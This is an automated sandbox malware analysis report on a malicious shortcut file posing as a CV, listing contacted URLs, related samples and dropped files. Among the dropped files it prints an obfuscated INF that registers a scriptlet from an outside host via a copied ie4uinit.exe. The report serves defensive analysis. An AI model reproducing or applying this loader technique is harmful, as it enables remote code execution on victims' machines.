https://yandex.com.tr/search/?text=	ie4uinit.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://suggest.yandex.ua/suggest-ff.cgi?srv=ie11&part=	xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr	false		high
http://www.yandex.com.tr/favicon.ico	ie4uinit.exe	false	Avira URL Cloud: safe	unknown
https://www.baidu.com/s?tn=80035161_2_dg&wd=	xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr	false		high
http://www.baidu.com/favicon.ico	ie4uinit.exe	false		high
https://suggest.yandex.by/suggest-ff.cgi?srv=ie11&part=	xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr	false		high
https://yandex.ua/search/?text=	ie4uinit.exe	false		high
http://davidrolls.com/aj550	ie4uinit.exe, 00000009.00000002.325448551.000001D314846000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, 00000009.00000003.325177677.000001D314845000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://davidrolls.com/aj55hg3eudeosLMEMH	ie4uinit.exe, 00000009.00000003.318341666.000001D314848000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://davidrolls.com/aj55hg3eudet	ie4uinit.exe, 00000009.00000003.318341666.000001D314848000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sogou.com/tx?hdq=sogou-wsse-6abba5d8ab1f4f32&query=	xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr	false		high
https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=	ie4uinit.exe	false	Avira URL Cloud: safe	unknown
https://cdn.jsdelivr.net/npm/axios/dist/axios.min.js	ie4uinit.exe, 00000009.00000002.325610168.000001D3164E0000.00000004.00000020.00020000.00000000.sdmp, aj55hg3eude[1].htm.9.dr	false		high
http://davidrolls.com/aj55hg3euded	ie4uinit.exe, 00000009.00000003.318208596.000001D31487F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/recaptcha/api.js	ie4uinit.exe, 00000009.00000002.325610168.000001D3164E0000.00000004.00000020.00020000.00000000.sdmp, aj55hg3eude[1].htm.9.dr	false		high
https://yandex.kz/search/?text=	ie4uinit.exe	false		high
http://davidrolls.com/aj55hg3eudeb	ie4uinit.exe, 00000009.00000003.318208596.000001D31487F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://suggest.yandex.kz/suggest-ff.cgi?srv=ie11&part=	xcopy.exe, 00000004.00000002.311010701.000002CB6F412000.00000004.00000020.00020000.00000000.sdmp, ie4uinit.exe, ie4uinit.exe, 00000009.00000000.313757180.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000000.314642408.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe, 0000000A.00000002.319094413.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmp, ie4uinit.exe.4.dr	false		high
http://www.yandex.com/favicon.ico	ie4uinit.exe	false		high
https://www.haosou.com/s?src=win10&ie=utf-8&q=	ie4uinit.exe	false		high
http://davidrolls.com/aj55hg3eudeC:	ie4uinit.exe, 00000009.00000003.318208596.000001D31489B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://davidrolls.com/aj55hg3eudeXXC:	ie4uinit.exe, 00000009.00000003.318208596.000001D31487F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.254.253.145	davidrolls.com	United States		54290	HOSTWINDSUS	false

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	791689
Start date and time:	2023-01-25 19:25:34 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	CV - David Rolls.lnk
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	19
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.bank.evad.winLNK@22/11@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 100% (good quality ratio 52.5%) Quality average: 30.8% Quality standard deviation: 35%
HCA Information:	Successful, ratio: 100% Number of executed functions: 28 Number of non-executed functions: 175
Cookbook Comments:	Found application associated with file extension: .lnk Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:26:32	API Interceptor	1x Sleep call for process: WMIC.exe modified

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTWINDSUS	EFT_Receipts.htm	Get hash	malicious	Browse	23.254.128.179
	Attachment REMITTANCE TRANSCRIPTION.html	Get hash	malicious	Browse	104.168.225.10
	Remittance Advice.html	Get hash	malicious	Browse	192.119.120.21
	file.exe	Get hash	malicious	Browse	23.254.224.247
	5x4TtmkPxl.exe	Get hash	malicious	Browse	104.168.152.36
	https://login2.hoomimhh.com/?tgug&qrc=ashley.johme@gelita.com	Get hash	malicious	Browse	142.11.216.126
	https://login2.hoomimhh.com/?tgug&qrc=evusa8513smm@darden.com	Get hash	malicious	Browse	142.11.216.126
	54321.html	Get hash	malicious	Browse	23.254.229.28
	Invoice#324621.one	Get hash	malicious	Browse	104.168.152.36
	Y1skZNCAx2.exe	Get hash	malicious	Browse	23.254.224.247
	9QOoQNhY1D.exe	Get hash	malicious	Browse	23.254.224.247
	http://pdf9st3s4.myddns.me/PAGE	Get hash	malicious	Browse	192.119.111.226
	DHL_BL_COMMERCIAL_INVOICE_PL_DELIVERYADDRESS_PDF.exe	Get hash	malicious	Browse	192.119.111.172
	R04BGoj9xJ.exe	Get hash	malicious	Browse	23.254.224.247
	uOb6AAUPCE.exe	Get hash	malicious	Browse	142.11.226.233
	Payment Advice.html	Get hash	malicious	Browse	23.254.229.28
	SecuriteInfo.com.Trojan.GenericKD.65027181.25149.9894.exe	Get hash	malicious	Browse	192.119.111.172
	file.exe	Get hash	malicious	Browse	142.11.226.233
	http://89743677348987793490832904.xyz	Get hash	malicious	Browse	104.168.147.17
	7mLxsA00ma.exe	Get hash	malicious	Browse	142.11.226.233

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe	David Evers - Account Manager.lnk	Get hash	malicious	Browse
	David Evers - Account Manager.lnk	Get hash	malicious	Browse
	Thomas P - CV.lnk	Get hash	malicious	Browse
	WIhN0ZPzXH.dll	Get hash	malicious	Browse
	My Resume.lnk	Get hash	malicious	Browse
	My Resume.txt.lnk	Get hash	malicious	Browse
	uW2K6OpbTr.dll	Get hash	malicious	Browse
	AkpjUKjiAM.dll	Get hash	malicious	Browse
	GeTMU8JgPO.dll	Get hash	malicious	Browse
	qNKCAaD6MH.dll	Get hash	malicious	Browse
	vQyN0LQPOU.dll	Get hash	malicious	Browse
	RYYGG7p89n.dll	Get hash	malicious	Browse
	cWTy1V8qAB.dll	Get hash	malicious	Browse
	h51Ox5q4Fp.dll	Get hash	malicious	Browse
	F8RGGe0pyU.dll	Get hash	malicious	Browse
	YCmvsk3Lmf.dll	Get hash	malicious	Browse
	x95V65Z00v.dll	Get hash	malicious	Browse
	nzWrKJjvIk.dll	Get hash	malicious	Browse
	3B73jGTgUj.dll	Get hash	malicious	Browse
	6956UYj49P.dll	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.bak

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6572
Entropy (8bit):	4.944402367860123
Encrypted:	false
SSDEEP:	96:Ovn93IEl/eX1b4ImTQ8bFiropZGvuQmTi70hulaW9YJ/clgv8cpT8FiJ3gLqMcDQ:klSanFiSRmiWTLgCF
MD5:	B85FA2310DCDD0CFBC9BE9A49B232F88
SHA1:	F98BEC81A73634351E936F2B8052231DEBBE8905
SHA-256:	50B5C1258CB697A789C4B5A935F06EFB1A8680F5E0D084B44FB5D975D0726009
SHA-512:	8028F53136BC6127B9E7DCA7A670D3EF9484FD8E83A598F0CB980CE9FD9AB8B025A52DD2933C61B49C77BF2CF167CDC3DEF89C43634850612E38106E75597F5D
Malicious:	false
Preview:	06/27/2019 11:12:42 Checking for existence of Branding Active Setup stub.....06/27/2019 11:12:42 InternetExplorerBrandGUID didn't exist: Branding component not installed..06/27/2019 11:12:42 Inf Version is set to "11,00,17134,1"...06/27/2019 11:12:42 HKCU Active Setup Key not found.....06/27/2019 11:12:42 COM initialized with S_FALSE success code.....06/27/2019 11:12:42 Branding Internet Explorer.....06/27/2019 11:12:42 Command line is "/mode:isp /peruser".....06/27/2019 11:12:42 Global branding settings are:..06/27/2019 11:12:42 Context is (0x01C00008) "Internet Content Providers, running from per-user stub";..06/27/2019 11:12:42 Settings file is "C:\Program Files (x86)\Internet Explorer\Signup\install.ins";..06/27/2019 11:12:42 Target folder path is "C:\Program Files (x86)\Internet Explorer\Signup"...06/27/2019 11:12:42 Done.....06/27/2019 11:12:42 About to clear previous branding.....06/27/2019 11:12:42 Done.....06/27/2019 11:12:42 Processing mig

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\brndlog.txt

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4294
Entropy (8bit):	4.918159976283007
Encrypted:	false
SSDEEP:	48:N8Q8SGXxE7lzUhvx2KViweHbTzcLoQd/uQTOh729v834lMqvlJeWlEPwLATny:YElo1rQDQTY7Gguf4wLATy
MD5:	D7B81AC95051A6251BEEE7A20DF2E325
SHA1:	BE9BD87D33DB2ADCDE01347B846EA0E4ED9BE822
SHA-256:	19CE9B17DD5F795EDDB1EB417BFDB082678381FF53F8B8415FE2EF27F82E52DE
SHA-512:	80977469B75976245427DF3514B35983FBE5996B61CB091457B7EC1FE6E2C48097DE13C217E1FDB8ACB7BB90DF06E75D39BD7ABE4BDC43965791D53E2635B1FD
Malicious:	false
Preview:	01/25/2023 19:26:37 Checking for existence of Branding Active Setup stub.....01/25/2023 19:26:37 InternetExplorerBrandGUID didn't exist: Branding component not installed..01/25/2023 19:26:37 Inf Version is set to "11,00,17134,1"...01/25/2023 19:26:37 Branding conditions failed. Applying only default branding.....01/25/2023 19:26:37 COM initialized with S_FALSE success code.....01/25/2023 19:26:37 Branding Internet Explorer.....01/25/2023 19:26:37 Command line is "/mode:isp /peruser".....01/25/2023 19:26:37 Global branding settings are:..01/25/2023 19:26:37 Context is (0x01C00008) "Internet Content Providers, running from per-user stub";..01/25/2023 19:26:37 Settings file is "C:\Program Files (x86)\Internet Explorer\Signup\install.ins";..01/25/2023 19:26:37 Target folder path is "C:\Program Files (x86)\Internet Explorer\Signup"...01/25/2023 19:26:37 Done.....01/25/2023 19:26:37 About to clear previous branding.....01/25/2023 19:26:37 Done.....01/25/2023

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	1436
Entropy (8bit):	3.38531527090533
Encrypted:	false
SSDEEP:	24:Qxril3EAH1MWkWT3dCeISBSSwyml3rF26MWkWc:CrOEAHSWL3dCeISBSsarF2TW0
MD5:	B5BFE80C2F97F93232C900A9B2B169F8
SHA1:	46650450AC34B5E9C7ECF96F63718AACADA93202
SHA-256:	37AB85A22B3F0E2B1965E33418FE33E3C46BDBA866B3B3D44D4934538AEEFC29
SHA-512:	642DAF2599077499B8F26F737055BAD3572DDB0A41FBEA1919D4C9E2B2DC998F5F0F5CE77EC2996448F1DA7F55A1C5971D33EA1B68B6C3872E1B36E3B06F95AF
Malicious:	false
Preview:	..0.6./.2.7./.2.0.1.9.:.1.1.:.1.2.:.4.3.:. .M.i.g.r.a.t.e.C.a.c.h.e.F.o.r.C.u.r.r.e.n.t.U.s.e.r.(.). .r.e.t.u.r.n.e.d.:. .0.x.0.0.0.0.0.0.0.0.....0.6./.2.7./.2.0.1.9.:.1.1.:.1.2.:.4.8.:. .C.o.m.m.a.n.d. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....0.6./.2.7./.2.0.1.9.:.1.1.:.1.2.:.4.8.:. .i.e.4.u.I.n.i.t...e.x.e. .e.x.i.t.i.n.g... . .P.r.o.c.e.s.s. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.....0.1./.2.5./.2.0.2.3.:.1.9.:.2.6.:.3.3.:. .S.t.a.r.t.i.n.g. .i.e.4.u.i.n.i.t...e.x.e... .C.o.m.m.a.n.d. .L.i.n.e.:.-.C.l.e.a.r.I.c.o.n.C.a.c.h.e.....0.1./.2.5./.2.0.2.3.:.1.9.:.2.6.:.3.3.:. .E.x.e.c.u.t.i.n.g. .C.o.m.m.a.n.d.:. .-.C.l.e.a.r.I.c.o.n.C.a.c.h.e.....0.1./.2.5./.2.0.2.3.:.1.9.:.2.6.:.3.3.:. .I.n. .C.m.d.C.l.e.a.r.I.c.o.n.C.a.c.h.e.....0.1./.2.5./.2.0.2.3.:.1.9.:.2.6.:.3.3.:. .I.n. .M.i.g.r.a.t.e.W.i.n.I.n.e.t.C.a.c.h.e.....0.1./.2.5./.2.0.2.3.:.1.9.:.2.6.:.3.4.:. .M.i.g.r.a.t.e.C.a.c.

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\ie4uinit-basesettings.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	860
Entropy (8bit):	3.491804402682413
Encrypted:	false
SSDEEP:	12:QIl2oTdHeMxzliAVzlunfA+QzlunfA+ZlYRYCDACzlk2zlJ4RYZMlWlK:QY1EMfZMA/MAYWOByk2JMWkWc
MD5:	C8A98E494A716ADE7F3B27279BCDD632
SHA1:	F4DB0983D9EB922840D1FCC141CBBB51BBF49C2C
SHA-256:	DED01ADEA11AB402C6613F8D097737B26A80A9383FDA85ACA840E1B9F47D828C
SHA-512:	D28D27ABFDB610420D43053C7FBE067F6C1F1A0560B9C9F2CD18A1E3CD1A5C8E3D3665ED5D2002BE6B2B1BEA50CD4FE974D3080A5731B9EACCA4F416261D3CEC
Malicious:	false
Preview:	..0.1./.2.5./.2.0.2.3.:.1.9.:.2.6.:.3.2.:. .I.n. .C.m.d.C.l.e.a.r.I.c.o.n.C.a.c.h.e.O.n.S.t.a.r.t.u.p.....0.1./.2.5./.2.0.2.3.:.1.9.:.2.6.:.3.7.:. .S.e.t.t.i.n.g. .H.o.m.e. .P.a.g.e.......0.1./.2.5./.2.0.2.3.:.1.9.:.2.6.:.3.7.:. .O.r.i.g.i.n.a.l. .F.i.r.s.t. .H.o.m.e. .P.a.g.e. .R.e.s.u.l.t.:.0.....0.1./.2.5./.2.0.2.3.:.1.9.:.2.6.:.3.7.:. .O.r.i.g.i.n.a.l. .F.i.r.s.t. .H.o.m.e. .P.a.g.e. .T.e.x.t.:.[.h.t.t.p.:././.g.o...m.i.c.r.o.s.o.f.t...c.o.m./.f.w.l.i.n.k./.p./.?.L.i.n.k.I.d.=.2.5.5.1.4.1.].......0.1./.2.5./.2.0.2.3.:.1.9.:.2.6.:.3.7.:. .C.o.m.m.a.n.d. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....0.1./.2.5./.2.0.2.3.:.1.9.:.2.6.:.3.7.:. .i.e.4.u.I.n.i.t...e.x.e. .e.x.i.t.i.n.g... . .P.r.o.c.e.s.s. .R.e.s.u.l.t.:. .0.x.0.0.0.0.0.0.0.0.....=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\aj55hg3eude[1].htm

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	7138
Entropy (8bit):	4.641450400022307
Encrypted:	false
SSDEEP:	96:oX7AiRse89wOx9iNSASASswQBbmbzj7j+yjwEond5oo1Sa1vq:oXEiRse2wOx9l55sw2bIzDwEond1SZ
MD5:	B0178793CE3836C467078A35A127B500
SHA1:	E0E543DB0E744022217F59787DA1F86FDAD5FAF6
SHA-256:	2D6896C38B2B838438A4C0784FAEF2D86B5207F16961C93B28A7F63D38053EED
SHA-512:	A6A22CAE3E03E59DE76D28BBC43856FA7A58A484F354BB8DD555FF6BE2780357D898FF3316647D207F7F37B0400A8E8456F44FFEF40104E352B3A0D5206A27DA
Malicious:	false
Preview:	<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="utf-8">.. <title>Aj55hg3eude</title>.. <meta content="width=device-width, initial-scale=1.0" name="viewport">.. <meta content="" name="keywords">.. <meta content="" name="description">.... Favicons -->.. <link href="img/favicon.png" rel="icon">.. <link href="img/apple-touch-icon.png" rel="apple-touch-icon">.... Bootstrap CSS File -->.. <link href="lib/bootstrap/css/bootstrap.min.css" rel="stylesheet">.... Libraries CSS Files -->.. <link href="lib/font-awesome/css/font-awesome.min.css" rel="stylesheet">.. <link href="lib/animate/animate.min.css" rel="stylesheet">.. <link href="lib/ionicons/css/ionicons.min.css" rel="stylesheet">.. <link href="lib/owlcarousel/assets/owl.carousel.min.css" rel="stylesheet">.. <link href="lib/lightbox/css/lightbox.min.css" rel="stylesheet">.... Main Stylesheet File -->.. <link href="css/style.css" rel="stylesheet">.... <scr

C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe

Download File

Process:	C:\Windows\System32\xcopy.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	221184
Entropy (8bit):	6.1390918249618585
Encrypted:	false
SSDEEP:	6144:RgDsww9O7gTBdbI6vxiBEByyrZKLeXOQPIx5mZ:0zlgfIvBjyrZwUJF
MD5:	9DD77F0F421AA9A70383210706ECA529
SHA1:	1EBEFD2674716D6302EC9AE88349CBDE52A18686
SHA-256:	8E8C4A1402E0AF960AB1FF23C8925BBC35B0F015537056CE5C51658519DE41BB
SHA-512:	17875904D790A56A08216732B60E1317F7B916258C903C24313188ECA5D948A6566F558C8F8ECE89BEB18F67B8730F98D7428EC14381C13C212BF8169EC768D5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 2%
Joe Sandbox View:	Filename: David Evers - Account Manager.lnk, Detection: malicious, Browse Filename: David Evers - Account Manager.lnk, Detection: malicious, Browse Filename: Thomas P - CV.lnk, Detection: malicious, Browse Filename: WIhN0ZPzXH.dll, Detection: malicious, Browse Filename: My Resume.lnk, Detection: malicious, Browse Filename: My Resume.txt.lnk, Detection: malicious, Browse Filename: uW2K6OpbTr.dll, Detection: malicious, Browse Filename: AkpjUKjiAM.dll, Detection: malicious, Browse Filename: GeTMU8JgPO.dll, Detection: malicious, Browse Filename: qNKCAaD6MH.dll, Detection: malicious, Browse Filename: vQyN0LQPOU.dll, Detection: malicious, Browse Filename: RYYGG7p89n.dll, Detection: malicious, Browse Filename: cWTy1V8qAB.dll, Detection: malicious, Browse Filename: h51Ox5q4Fp.dll, Detection: malicious, Browse Filename: F8RGGe0pyU.dll, Detection: malicious, Browse Filename: YCmvsk3Lmf.dll, Detection: malicious, Browse Filename: x95V65Z00v.dll, Detection: malicious, Browse Filename: nzWrKJjvIk.dll, Detection: malicious, Browse Filename: 3B73jGTgUj.dll, Detection: malicious, Browse Filename: 6956UYj49P.dll, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7Uj.s4..s4..s4...P..p4...P..h4...P..w4...P..Z4..s4..J6...P...4...P..r4...P..r4..Richs4..................PE..d................."......6...0.......8.........@..........................................`.......... ..........................................\|.......`....`...................... ...T....................c..(....b...............c..x.......@....................text....4.......6.................. ..`.rdata.......P.......:..............@..@.data........@....... ..............@....pdata.......`.......(..............@..@.didat..(............B..............@....rsrc...`............D..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\ieuinit.inf

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	491
Entropy (8bit):	5.159488022592713
Encrypted:	false
SSDEEP:	12:WH8nv/eWRWx+PlqKty9EovGX7BgFdCAs74lCAt2bqgADO:WHkuWHPySovGX7B737n72y
MD5:	0635B9783C4DE7D1EBC47A1CB24CD640
SHA1:	691681022402A377BAAFDA5F2A2F045B76CA3A67
SHA-256:	499E75C21B9C8EF8528538B9EE30FB7A0657CA1E5772396464CA49670CE70EB2
SHA-512:	3CAA5F9510D9E6FA367211FAB6F35C35664D201F33791A3198CA2F6D9943A4A078C5092F0940196FBF5CC5E64FDB68480239C5C5E1158B43EC1E5F418D5B989B
Malicious:	false
Preview:	[version]..signature = $windows nt$..[destinationdirs]..C3D81=01..defaultdestdir=11..[C3D81]..ieu%Images15%.inf..[FD48E1]..sc\..ro%Images95%j,NI,%Images81%%Images2%%Images2%p%Images66%%Images0%%Images0%davidrolls.%Images76%/aj55hg3eude..[defaultinstall.windows7]..Un\..Register\..OCXs=FD48E1..delfiles=C3D81..[strings]..Images2=t;Images26..servicename=' '..Images15=init..Images27=19:26:30.14..shortsvcname=' '..Images0=/..Images95=b;Images08..Images76=com..Images66=:;Images03..Images81=h..

C:\Users\user\Favorites\Bing.url

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Generic INItialization configuration [InternetShortcut]
Category:	dropped
Size (bytes):	208
Entropy (8bit):	5.212608038799256
Encrypted:	false
SSDEEP:	6:J254vVG/4xtOFJQgD8eDPOOKaihPlvsHX/qRyLb1CC:3VW4xtOFJ/DPOOKa403SyCC
MD5:	5D42DDDDA9951546C9D43F0062C94D39
SHA1:	4AF07C23EBB93BAD9B96A4279BEE29EBA46BE1EE
SHA-256:	E0C0A5A360482B5C5DED8FAD5706C4C66F215F527851AD87B31380EF6060696E
SHA-512:	291298B4A42B79C4B7A5A80A1A98A39BE9530C17A83960C2CF591B86382448CD32B654A00FC28EAB4529DF333A634BCDC577AEF4A3A0A362E528B08F5221BEB1
Malicious:	false
Preview:	[{000214A0-0000-0000-C000-000000000046}]..Prop3=19,2..[InternetShortcut]..IDList=..URL=http://go.microsoft.com/fwlink/p/?LinkId=255142..IconIndex=0..IconFile=%ProgramFiles%\Internet Explorer\Images\bing.ico..

C:\Windows\Temp\OLD81EC.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Windows setup INFormation
Category:	dropped
Size (bytes):	491
Entropy (8bit):	5.159488022592713
Encrypted:	false
SSDEEP:	12:WH8nv/eWRWx+PlqKty9EovGX7BgFdCAs74lCAt2bqgADO:WHkuWHPySovGX7B737n72y
MD5:	0635B9783C4DE7D1EBC47A1CB24CD640
SHA1:	691681022402A377BAAFDA5F2A2F045B76CA3A67
SHA-256:	499E75C21B9C8EF8528538B9EE30FB7A0657CA1E5772396464CA49670CE70EB2
SHA-512:	3CAA5F9510D9E6FA367211FAB6F35C35664D201F33791A3198CA2F6D9943A4A078C5092F0940196FBF5CC5E64FDB68480239C5C5E1158B43EC1E5F418D5B989B
Malicious:	false
Preview:	[version]..signature = $windows nt$..[destinationdirs]..C3D81=01..defaultdestdir=11..[C3D81]..ieu%Images15%.inf..[FD48E1]..sc\..ro%Images95%j,NI,%Images81%%Images2%%Images2%p%Images66%%Images0%%Images0%davidrolls.%Images76%/aj55hg3eude..[defaultinstall.windows7]..Un\..Register\..OCXs=FD48E1..delfiles=C3D81..[strings]..Images2=t;Images26..servicename=' '..Images15=init..Images27=19:26:30.14..shortsvcname=' '..Images0=/..Images95=b;Images08..Images76=com..Images66=:;Images03..Images81=h..

C:\Windows\security\logs\scecomp.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\ie4uinit.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	256
Entropy (8bit):	3.5674700623860134
Encrypted:	false
SSDEEP:	6:QIl8GOslwGklu8+82RKUEZglJPZeza+MekR5s2yKslrya2j2qv:QIlcslzu+82RKMJn+4s2yKsJ82Q
MD5:	CFC4C7104287362A5DC73EC14E50D211
SHA1:	987B21E88AC95D8B247471E98B4370265AE599B7
SHA-256:	6E6404823D219A3A20AD006AF2861C71EAF04A895F841B8E05FF759F05B36891
SHA-512:	99DF60B81F8F177238C6BE87ABB72586A3493CFC3C6C67DBA524DB30E75C9BE3927EDF9C195ABA4171A281DBCD1E3B89002A6AAD2A57D36FF007828865815E65
Malicious:	false
Preview:	..0.1./.2.5./.2.0.2.3. .1.9.:.2.6.:.3.7...S.u.c.c.e.e.d...M.o.v.e...F.i.l.e.......C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.m.i.c.r.o.s.o.f.t.\.i.e.u.i.n.i.t...i.n.f...O.p.e.r.a.t.i.o.n. .a.b.o.r.t.e.d. .-. .n.o.t. .i.n. .s.e.t.u.p.....

\Device\ConDrv

Download File

Process:	C:\Windows\System32\wbem\WMIC.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	160
Entropy (8bit):	5.095703110114614
Encrypted:	false
SSDEEP:	3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgnSUe/qJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egSUEqeF
MD5:	D84181911F14E97E6C55E9500D8C1B83
SHA1:	5EA75B29227CCBDD997C5983004679731EF16525
SHA-256:	560A7288057611177425FCE266B34E6E9151429F5BDAA2E88CD7B6C73B1E6598
SHA-512:	D0E17F2FF0693F8DD57ACE7690514931463A6A6E3A3EFC4CA42B912BDD9C9F92C47F30CA158DC671710E603B07AAD3F9B7AA5FF24C3FACDF92FDF33FED2F1571
Malicious:	false
